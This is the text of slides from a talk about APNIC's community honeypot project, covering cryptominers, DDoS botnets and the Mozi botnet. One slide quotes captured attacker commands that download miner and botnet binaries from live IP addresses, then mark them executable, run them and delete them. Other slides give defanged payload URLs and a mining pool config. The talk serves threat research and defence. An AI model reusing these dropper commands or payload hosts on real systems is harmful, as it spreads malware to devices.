APNIC Senior Internet Security Specialist Adli Wahid shares his insights on observations from the APNIC Community Honeynet Project at InfoSec Taiwan 2023, held in Taipei from 1 to 4 August 2023.
2. 你好
oSr. Security Specialist @ APNIC since 2014
o Previously at Malaysia CERT, Bank of Tokyo
Mitsubishi UFJ
oLet’s Connect – Adli Wahid on LinkedIn
2
3. The Plan
1. APNIC Community Honeynet Project
2. Observations / Insights
3. Take Aways
3
4. Honeypots / Honeytokens
• Old Tech?
• Exposed systems / Tokens
• No production value
• Enterprise vs Research Honeypots
• Real value for defenders
o Detection
o Starting point for investigation
o IOCs
• But
o Coverage – not all type of attacks
o Depends on how you setup the honeypots vs knowledge of attack
o Fingerprint
4
5. APNIC Community Honeynet Project
• APNIC – Regional Internet Registry for Asia Pacific Region
oIP addresses delegation, whois, RPKI
oCapacity Development
• APNIC Community Honeynet Project
• Initially used for awareness and training (2014)
• Since 2018 deployment with multiple sensors
• The Backend
• Open Source projects (Community Honey Network / CHN), Elastic Stack +
scripts
• Mix of Telnet/SSH (Cowrie) and Dionaea
5
6. APNIC Community Honeynet Project (2)
• Data Shared / Used
oInternally dash.apnic.net for APNIC Members to be notified if
their IPs are seen in the honeypot logs
oSharing with communities – ShadowServer Foundation,
CERTs/CSIRTs, Feeds for MISP
o Research and Analysis (need to do more here)
• We welcome partnerships in any form J
6
8. In a nutshell
• No surprises, nothing really ‘sophisticated’
• Botnets, ddos agents, miners
• Attackers build infrastructure for running attacks & campaigns
• Attackers leverage on open vulnerabilities
• Easy to spot and see – but if you’re not watching (or aware) you’ll
miss it
• Bigger picture – secure development, deployment and incident
response. How can we stop or discourage the attacks?
8
13. 13
cd /tmp
wget -qc http://209.97.132.66/miner3.tgz
tar xf miner3.tgz
rm -rf miner3.tgz
cd .cache
chmod +x *
./x >.a
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/mips; chmod +x mips; ./mips; rm -rf
mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/mipsel; chmod +x mipsel; ./mipsel; rm -
rf mipsel
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/sh4; chmod +x sh4; ./sh4; rm -rf sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/x86; chmod +x x86; ./x86; rm -rf x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/arm61; chmod +x arm61; ./arm61; rm -rf
arm61
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/i686; chmod +x i686; ./i686; rm -rf
i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/ppc; chmod +x ppc; ./ppc; rm -rf ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/586; chmod +x 586; ./586; rm -rf 586
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/m68k; chmod +x m68k; ./m68k; rm -rf
m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/dc; chmod +x dc; ./dc; rm -rf dc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/dss; chmod +x dss; ./dss; rm -rf dss
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/co; chmod +x co; ./co; rm -rf co
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/scar; chmod +x scar; ./scar; rm -rf
scar
14. What is in the Config?
"pools": [
{
"algo": null,
"coin": null,
"url": "pool.hashvault.pro:80",
"user":
"49oZc6c6rB58TD6KmU2m5qGGbmdeknXgQHrU[redacted]TqrjpzwdTTnwhShnoWz4BbKAMfWLNApG6ARGoS",
[redacted]
14
19. Changing Infrastructure
• DDoS Botnet (Tsunami**)
• Started with just 4 hosts in April 2021
• More than 12k ip addresses to date
• Evolution
• April 21 – Jan 22
o hxxp://71.127.148.69/.x/*.sh
• Jan 22 – Feb 22
o hxxp://202.110.187.205/.x/*.sh
• Feb 22 –
o hxxp://61.177.137.133/.x/*.sh
oStill active in 2023. 5-6 to URL(IP
address)
19
20. Left-Over of Mozi (p2p botnet)?
20
https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/
22. Activities in Honeypots
22
• In 05/2022, we observed an ELF
binary “.i” in some URLs
o Post-login downloads
• Pattern looks familiar
http://xxx.xxx.xxx.xxx:random_port/.i
• IP in URL can be the same as attacking
host or different
1. Telnet username:password
2. wget http://x.x.x.x:nnnn/.1
Source IP (attacking/spreading) IP hosting binary:random_port
o2022-05-25T11:23:24.433026,59.3.30.251,hxxp://59.3.30.251:10035/.i,KR,4766
o2022-05-25T17:27:31.588334,222.174.143.18,hxxp://222.174.143.18:56102/.i,CN,4134
o2022-05-26T03:46:12.338083,114.34.185.8,hxxp://114.34.185.8:11470/.i,TW,3462
o2022-05-26T03:30:41.219380,95.154.75.244,hxxp://95.154.75.244:12107/.i,RU,44724
o2022-05-26T06:51:04.319952,37.255.216.173,hxxp://51.19.186.165:23349/.i,IR,58224
o2022-05-26T07:58:51.970983,167.179.185.255,hxxp://31.168.218.95:28681/.i,AU,4764
o2022-05-26T07:35:24.881174,114.230.69.4,hxxp://114.230.69.4:10816/.i,CN,4134
o2022-05-26T08:32:08.109785,167.179.61.43,hxxp://46.237.87.18:9331/.i,HK,135273
23. The “.i” & Finding Mozi
o .i: ELF 32-bit LSB executable,
ARM, EABI5 version 1 (GNU/Linux),
statically linked, stripped
• SHA256
a04ac6d98ad989312783d4fe3456c53730
b212c79a426fb215708b6c6daa3de3
o Known to VirusTotal
• Finding Mozi
• Maybe we can find Mozi.m or Mozi.a on
the webserver?
o If .i in $IP:PORT
o Then download $IP:PORT/mozi.a
|| $IP:PORT/mozi.m ||
$IP:PORT/Mozi.m ||
$IP:PORT/Mozi.a ||
$IP:PORT/config
23
25. Mozi (story) Recap
• A known threat
• Still propagating (58k) unique ip
addresses observed since last year
• Basic Practice of device security
management* can help prevent
infection but …
25
Palau (PW)
26. Take Aways
1. Honeypots has value
o Simplest form of detection or awareness but allows going in depth
o Understanding Attackers Infrastructure (Left of the Hack)
o Priorities Ransomware vs DDoS agent vs Crytpominers
o Priorities: Windows vs Linux/Unix
2. Incident Response
o Sharing is not equal to fixing
o Prevention is great but what about the actors
o Capabilities and Appetite of relevant entities (CERTs/CSIRTs, LEAs)
3. Implication of No Action
o Security implementation is not wholistic
o Cyber criminal: Access broker, problem getting bigger (DDoS), profitability
26